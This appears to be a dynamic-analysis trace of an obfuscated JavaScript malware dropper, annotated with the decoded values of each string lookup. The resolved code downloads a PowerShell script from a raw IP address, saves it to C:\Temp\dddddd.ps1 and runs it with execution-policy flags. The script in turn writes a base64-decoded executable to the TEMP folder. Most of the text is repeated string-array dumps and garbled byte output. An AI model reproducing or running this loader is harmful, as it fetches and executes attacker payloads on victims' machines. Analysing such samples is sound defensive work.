,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
return _0xe32f =
function (_0xe32f90, _0x265890) {
  • _0xe32f(310,undefined) ➔ "W4iJW43dGGa8W5i7W40iWOVcRq4"
  • _0xe32f(310,undefined) ➔ "rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia"
  • _0xe32f(310,undefined) ➔ "124678FeSFCc"
  • _0xe32f(310,undefined) ➔ "WQ7dVXVcVCkpCLJcM8keW6W"
  • _0xe32f(310,undefined) ➔ "5836fimqHT"
  • _0xe32f(289,undefined) ➔ "C:\Temp\dddddd.ps1"
  • _0xe32f(274,undefined) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
  • _0xe32f(292,undefined) ➔ "MSXML2.XMLHTTP"
  • _0xe32f(287,undefined) ➔ "CreateFolder"
  • _0xe32f(282,undefined) ➔ "GET"
_0xe32f90 = _0xe32f90 - 0x111;
var _0xd04222 = _0x3d8f07[_0xe32f90];
return _0xd04222;
}, _0xe32f ( _0x52b743, _0xdbcf57 );
}
function DownloadScript(_0x26adf9, _0xa9f75e) {
  • DownloadScript("http://196.251.92.64/crypt/popo.ps1","C:\Temp\dddddd.ps1") ➔ true
var _0x43684b = _0x165511, _0x5b10a7 = _0x429836, _0x5e2485 = _0x36bb1e;
try
{
http[_0x5e2485 ( 0x134, 'h*bh' ) ] ( _0x5b10a7 ( 0x11a ), _0x26adf9, ! [] ), http[_0x5e2485 ( 0x11c, '[aOH' ) ] ( );
  • _0x5e2485(308,"h*bh") ➔ "Open"
  • _0xe32f(282) ➔ "GET"
  • Open("GET","http://196.251.92.64/crypt/popo.ps1",false) ➔ undefined
  • _0x5e2485(284,"[aOH") ➔ "Send"
  • Send() ➔ undefined
if ( http[_0x43684b ( 0x119 ) ] === SUCCESS_STATUS )
  • _0x43684b(281) ➔ "Status"
{
var _0x3564e4 = fileSystem[_0x5b10a7 ( 0x111 ) ] ( _0xa9f75e, ! ! [] );
  • _0x5b10a7(273) ➔ "CreateTextFile"
  • CreateTextFile("C:\Temp\dddddd.ps1",true) ➔
return _0x3564e4[_0x5e2485 ( 0x117, 'X$G)' ) ] ( http['ResponseText'] ), _0x3564e4['Close'] ( ), ! ! [];
  • _0x5e2485(279,"X$G)") ➔ "Write"
  • Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe") [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("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") ➔ undefined
  • Close() ➔ undefined
}
else
return LogError ( _0x5b10a7 ( 0x114 ) + http[_0x43684b ( 0x119 ) ] ), ! [];
}
catch ( _0x317ee2 )
{
return LogError ( _0x5e2485 ( 0x120, '[ck$' ) + _0x317ee2['message'] ), ! [];
}
}
function LogError(_0xee0fb4) {
var _0x5c2acd = _0x36bb1e;
WScript[_0x5c2acd ( 0x131, 'Ws2$' ) ] ( _0xee0fb4 );
                                                                                                                                                              }
                                                                                                                                                                60
                                                                                                                                                                function _0x2aa5(_0x52b743, _0xdbcf57) {
                                                                                                                                                                • _0x2aa5(277) ➔ undefined
                                                                                                                                                                • _0x2aa5(277) ➔ "9716744ntollE"
                                                                                                                                                                • _0x2aa5(291) ➔ undefined
                                                                                                                                                                • _0x2aa5(277) ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                • _0x2aa5(277) ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                • _0x2aa5(291) ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                • _0x2aa5(306) ➔ undefined
                                                                                                                                                                • _0x2aa5(277) ➔ "5141585tSDBkb"
                                                                                                                                                                • _0x2aa5(291) ➔ "12642224tnuDGo"
                                                                                                                                                                • _0x2aa5(306) ➔ "9716744ntollE"
                                                                                                                                                                61
                                                                                                                                                                var _0x3d8f07 = _0x3d8f ( );
                                                                                                                                                                • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
                                                                                                                                                                • _0x3d8f() ➔ 124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia
                                                                                                                                                                • _0x3d8f() ➔ 124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia
                                                                                                                                                                • _0x3d8f() ➔ WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc
                                                                                                                                                                • _0x3d8f() ➔ W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W
                                                                                                                                                                • _0x3d8f() ➔ W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W
                                                                                                                                                                • _0x3d8f() ➔ W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W
                                                                                                                                                                • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                                                                • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                                                                • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                                                                62
                                                                                                                                                                return _0x2aa5 =
                                                                                                                                                                  63
                                                                                                                                                                  function (_0xe32f90, _0x265890) {
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ undefined
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ "9716744ntollE"
                                                                                                                                                                  • _0x2aa5(291,undefined) ➔ undefined
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                  • _0x2aa5(291,undefined) ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                  • _0x2aa5(306,undefined) ➔ undefined
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ "5141585tSDBkb"
                                                                                                                                                                  • _0x2aa5(291,undefined) ➔ "12642224tnuDGo"
                                                                                                                                                                  • _0x2aa5(306,undefined) ➔ "9716744ntollE"
                                                                                                                                                                  64
                                                                                                                                                                  _0xe32f90 = _0xe32f90 - 0x111;
                                                                                                                                                                    65
                                                                                                                                                                    var _0xd04222 = _0x3d8f07[_0xe32f90];
                                                                                                                                                                      66
                                                                                                                                                                      if ( _0x2aa5['YxazEp'] === undefined )
                                                                                                                                                                        67
                                                                                                                                                                        {
                                                                                                                                                                          68
                                                                                                                                                                          var _0x1d860e = function (_0x5598af) {
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("124678FeSFCc") ➔ undefined
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("otCXnJC0ng50B2XSrq") ➔ "9716744ntollE"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("GET") ➔ undefined
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa") ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("W5eDD8oh") ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("WQhdRvRdTW") ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("12642224tnuDGo") ➔ undefined
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("nte0mtu4nxrtrejRyG") ➔ "5141585tSDBkb"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("mti2ndiYmJr0BNver28") ➔ "12642224tnuDGo"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("otCXnJC0ng50B2XSrq") ➔ "9716744ntollE"
                                                                                                                                                                          69
                                                                                                                                                                          var _0x51df1d = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                                                                                                            70
                                                                                                                                                                            var _0x31b964 = '', _0x154394 = '';
                                                                                                                                                                              71
                                                                                                                                                                              for ( var _0x203110 = 0x0, _0x1d9a6f, _0x3ffedd, _0x2aa5db = 0x0 ; _0x3ffedd = _0x5598af['charAt'] ( _0x2aa5db ++ ) ; ~ _0x3ffedd && ( _0x1d9a6f = _0x203110 % 0x4 ? _0x1d9a6f * 0x40 + _0x3ffedd : _0x3ffedd, _0x203110 ++ % 0x4 ) ? _0x31b964 += String['fromCharCode'] ( 0xff & _0x1d9a6f >> ( - 0x2 * _0x203110 & 0x6 ) ) : 0x0 )
                                                                                                                                                                                72
                                                                                                                                                                                {
                                                                                                                                                                                  73
                                                                                                                                                                                  _0x3ffedd = _0x51df1d['indexOf'] ( _0x3ffedd );
                                                                                                                                                                                    74
                                                                                                                                                                                    }
                                                                                                                                                                                      75
                                                                                                                                                                                      for ( var _0x2f4f63 = 0x0, _0x241040 = _0x31b964['length'] ; _0x2f4f63 < _0x241040 ; _0x2f4f63 ++ )
                                                                                                                                                                                        76
                                                                                                                                                                                        {
                                                                                                                                                                                          77
                                                                                                                                                                                          _0x154394 += '%' + ( '00' + _0x31b964['charCodeAt'] ( _0x2f4f63 ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                                                                            78
                                                                                                                                                                                            }
                                                                                                                                                                                              79
                                                                                                                                                                                              return decodeURIComponent ( _0x154394 );
                                                                                                                                                                                              • decodeURIComponent("%d7%6e%3a%ef%c7%c4%b1%f7%02") ➔ undefined
                                                                                                                                                                                              • decodeURIComponent("%39%37%31%36%37%34%34%6e%74%6f%6c%6c%45") ➔ "9716744ntollE"
                                                                                                                                                                                              • decodeURIComponent("%81%eb") ➔ undefined
                                                                                                                                                                                              • decodeURIComponent("%c2%a2%c2%bf%68%c3%af%1c%c2%ad%22%c2%bb%c3%bc%4a%c2%a8%51%c2%b1%c2%8a%c3%94%c2%aa%24%6f%7d%48%c3%bf%6e%c3%8c%7b%c3%86%58") ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                                              • decodeURIComponent("%c3%91%1d%77%c3%87") ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                                              • decodeURIComponent("%c2%a1%c3%ad%5a%c3%b7") ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                                              • decodeURIComponent("%d7%6e%b8%db%6d%b8%4c%d5%1d%80") ➔ undefined
                                                                                                                                                                                              • decodeURIComponent("%35%31%34%31%35%38%35%74%53%44%42%6b%62") ➔ "5141585tSDBkb"
                                                                                                                                                                                              • decodeURIComponent("%31%32%36%34%32%32%32%34%74%6e%75%44%47%6f") ➔ "12642224tnuDGo"
                                                                                                                                                                                              • decodeURIComponent("%39%37%31%36%37%34%34%6e%74%6f%6c%6c%45") ➔ "9716744ntollE"
                                                                                                                                                                                              80
                                                                                                                                                                                              };
                                                                                                                                                                                                81
                                                                                                                                                                                                _0x2aa5['zEmbtU'] = _0x1d860e, _0x52b743 = arguments, _0x2aa5['YxazEp'] = ! ! [];
                                                                                                                                                                                                  82
}
var _0x3cf29b = _0x3d8f07[0x0], _0x360a4b = _0xe32f90 + _0x3cf29b, _0x301f1f = _0x52b743[_0x360a4b];
return ! _0x301f1f ? ( _0xd04222 = _0x2aa5['zEmbtU'] ( _0xd04222 ), _0x52b743[_0x360a4b] = _0xd04222 ) : _0xd04222 = _0x301f1f, _0xd04222;
  • function (_0xe32f90, _0x265890).zEmbtU("124678FeSFCc") ➔ undefined
  • function (_0xe32f90, _0x265890).zEmbtU("otCXnJC0ng50B2XSrq") ➔ "9716744ntollE"
  • function (_0xe32f90, _0x265890).zEmbtU("GET") ➔ undefined
  • function (_0xe32f90, _0x265890).zEmbtU("WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa") ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
  • function (_0xe32f90, _0x265890).zEmbtU("W5eDD8oh") ➔ "\xd1\x1dw\xc7"
  • function (_0xe32f90, _0x265890).zEmbtU("WQhdRvRdTW") ➔ "\xa1\xedZ\xf7"
  • function (_0xe32f90, _0x265890).zEmbtU("12642224tnuDGo") ➔ undefined
  • function (_0xe32f90, _0x265890).zEmbtU("nte0mtu4nxrtrejRyG") ➔ "5141585tSDBkb"
  • function (_0xe32f90, _0x265890).zEmbtU("mti2ndiYmJr0BNver28") ➔ "12642224tnuDGo"
  • function (_0xe32f90, _0x265890).zEmbtU("otCXnJC0ng50B2XSrq") ➔ "9716744ntollE"
}, _0x2aa5 ( _0x52b743, _0xdbcf57 );
}
function _0x5598(_0x52b743, _0xdbcf57) {
  • _0x5598(278,"E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
  • _0x5598(304,"[aOH") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ undefined
  • _0x5598(278,"E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
  • _0x5598(304,"[aOH") ➔ undefined
